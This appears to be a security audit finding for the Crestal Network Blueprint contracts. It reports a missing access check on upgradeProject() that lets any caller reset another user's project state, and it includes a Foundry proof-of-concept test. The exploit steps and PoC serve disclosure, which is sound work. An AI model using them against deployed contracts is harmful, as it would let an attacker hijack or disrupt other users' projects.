Old Latte Bull

Medium

# upgradeProject() can be called by anyone on projects that don't belong to him

### Summary

There are no checks on the the function `upgradeProject()` and anyone can call it, this will allow a malicious user ( user2 ) to reset any project infos. Which may potentially allow him to deploy other instances using the same `projectId` that belongs to `user1`

### Root Cause

In [`BlueprintCore.sol:198`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198) there is a function `upgradeProject()` which can reset any project infos to 0 with no access control checks. If you look at [`BlueprintCore.sol:221`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L221)  there is a check which allows requesting another proposal if `requestProposalID == 0`, also on [`deploymentRequest()`](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L302) there is check which allows requesting deployment if `requestDeploymentID == 0`. 
Resetting these variables using `upgradeProject()` may allow deploying multiple times using the same `projectId`

### Internal Pre-conditions

N/A

### External Pre-conditions

N/A

### Attack Path

1. User1 creates a project, requests proposal, and request deployment, this will send the `requestDeploymentID` to a worker which will then finish deployment.
2. User2 ( malicious ) resets the project infos using `upgradeProject()` , this will reset `requestProposalID`, `requestDeploymentID`, and `proposedSolverAddr` to 0.
3. Now the checks `require(projects[projectId].requestDeploymentID == 0` and `require(projects[projectId].requestProposalID == 0` will pass again.

Please note that an event will be emitted upon requesting proposal , so an attacker can easily get project ID's onchain ( using foundry `cast logs` for example )  and then reset the project infos.

### Impact
- Anyone can reset the progress of another user's project back to 0. 
- May allow triggering other deployments using the same `projectId` , using a project that belongs to another user, since the require statements will pass.
( No event is emitted on upgradeProject, which means no one knows it’s happening until it’s too late ).


### PoC

Please run the test using `forge test --mt test_MaliciousUpgradeProject -vvvv` to view the details of `getProjectInfo()` to check that it has been resetted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import {Test, console} from "forge-std/Test.sol";
import {Vm} from "forge-std/Vm.sol";
import {BlueprintV5} from "../src/BlueprintV5.sol";
import {BlueprintCore} from "../src/BlueprintCore.sol";
import {Blueprint} from "../src/Blueprint.sol";
import {stdError} from "forge-std/StdError.sol";
import {MockERC20} from "./MockERC20.sol";

contract AuditTest is Test {
    BlueprintV5 public blueprint;
    MockERC20 public mockToken;
    bytes32 public projectId;
    address public workerAddress;
    address public dummyAddress;
    address public user = address(0x1338);
    address public attacker = address(0x1337);

    function setUp() public {
        blueprint = new BlueprintV5();
        blueprint.initialize(); // mimic upgradeable contract deploy behavior

        mockToken = new MockERC20();

        // set crestal wallet address
        blueprint.setFeeCollectionWalletAddress(address(0x7D8be0Dd8915E3511fFDDABDD631812be824f578));

        projectId = bytes32(0x2723a34e38d0f0aa09ce626f00aa23c0464b52c75516cf3203cc4c9afeaf2980);
        workerAddress = address(0x4d6585D89F889F29f77fd7Dd71864269BA1B31df);
        dummyAddress = address(0);
    }


    function test_MaliciousUpgradeProject() public {

        // user create project and deployment request
        vm.startPrank(user);
        blueprint.createProjectIDAndDeploymentRequest(
            projectId,"test base64 param", "test server url"
        );

        blueprint.getProjectInfo(projectId);

        // malicious user upgrade project
        vm.startPrank(attacker);
        blueprint.upgradeProject(projectId);

        blueprint.getProjectInfo(projectId);
        
    }


}
```

### Mitigation

_No response_